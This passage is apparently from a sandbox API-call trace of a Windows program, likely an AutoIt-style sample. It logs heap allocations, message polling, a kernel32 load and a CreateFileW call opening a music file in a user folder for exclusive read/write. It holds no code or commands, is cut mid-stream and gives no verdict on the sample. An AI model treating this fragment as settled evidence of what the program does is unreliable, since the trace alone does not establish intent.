(HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.519] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.519] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0184.520] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0184.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0184.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.523] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.523] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0184.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0184.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0184.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\kqpdy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.527] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.529] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0184.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0184.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0184.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0184.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.530] 